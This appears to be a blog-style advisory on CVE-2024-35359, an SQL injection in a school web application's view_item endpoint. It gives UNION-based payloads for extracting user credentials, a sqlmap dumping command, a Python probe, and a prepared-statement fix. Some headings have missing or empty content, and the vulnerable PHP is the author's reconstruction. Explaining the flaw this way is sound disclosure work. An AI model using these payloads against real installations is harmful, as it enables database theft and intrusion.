CVE-2024-35359 - Critical SQL Injection in Diño Physics School Assistant 2.3 — Full Exploit Guide

A serious security vulnerability, CVE-2024-35359, has been discovered in the Diño Physics School Assistant web application, specifically in version 2.3. This popular tool, used by educational institutions, is prone to SQL injection due to improper handling of user input in the /classes/Master.php?f=view_item endpoint.

This guide explains the vulnerability in simple language, shows real code samples, explains how it can be exploited, and gives advice for mitigation. Security researchers and administrators should read this carefully.

Vulnerable Version: 2.3

- Vulnerable File: /classes/Master.php?f=view_item

The Vulnerability in Technical Terms

The problem comes from missing proper input validation and sanitization on the id parameter. When a user accesses a URL like:

/classes/Master.php?f=view_item&id=1

the code behind this page inserts the value of id straight into an SQL query without checking if the input is safe.

This creates a classic case of SQL Injection, meaning a smart attacker can craft a request that manipulates the database.

Let’s look at a simplified (but realistic) version of the code inside Master.php

<?php
// Suppose this is inside Master.php
if($_GET['f'] == 'view_item' && isset($_GET['id'])) {
    $id = $_GET['id'];
    // BAD! No sanitization!
    $query = "SELECT * FROM items WHERE id = $id";
    $result = $conn->query($query);
    // ...display results
}
?>

What’s wrong?
If a user puts anything into the id parameter (not just numbers), it will be inserted into the SQL query as-is.

An attacker could navigate to

/classes/Master.php?f=view_item&id=1 OR 1=1

This will change the query to

SELECT * FROM items WHERE id = 1 OR 1=1

Now, every row in the items table will be selected and probably displayed or processed!

But it gets worse. An attacker might attempt something like

/classes/Master.php?f=view_item&id=1 UNION SELECT username, password FROM users--

Step 3: Full SQLi Automation

This endpoint is so vulnerable it can be exploited with automated tools like sqlmap:

sqlmap -u "http://example.com/classes/Master.php?f=view_item&id=1"; --dbs

This will let an attacker enumerate database names, extract tables, and dump sensitive info.

Here’s a simple proof-of-concept in Python that tests for SQL injection

import requests

url = "http://example.com/classes/Master.php?f=view_item";
payload = "1 OR 1=1"

params = {
    "id": payload
}

r = requests.get(url, params=params)
if "All items" in r.text or r.status_code == 200:
    print("[+] Vulnerable to SQL Injection!")
else:
    print("[-] Not vulnerable")

Mitigation and Fix

Developers:

Example (Using PDO)

$stmt = $conn->prepare('SELECT * FROM items WHERE id = ?');
$stmt->execute([$_GET['id']]);

Site Admins:

References

- Original CVE Record (Mitre)
- SQL Injection - OWASP Explanation
- sqlmap – Automatic SQL Injection
- PDO Prepared Statements - PHP Manual

Conclusion

CVE-2024-35359 is a textbook example of why input validation and using secure coding techniques is so important. Sites running Diño Physics School Assistant 2.3 are vulnerable to SQL injection, and the exploit is very easy to perform. If you're responsible for such a system, patch or secure your site immediately.

Stay safe, and always validate your inputs!

*This article is exclusive to this post and summarizes all available public details as of June 2024.*

Timeline

Published on: 05/30/2024 17:15:34 UTC
Last modified on: 08/19/2024 15:35:07 UTC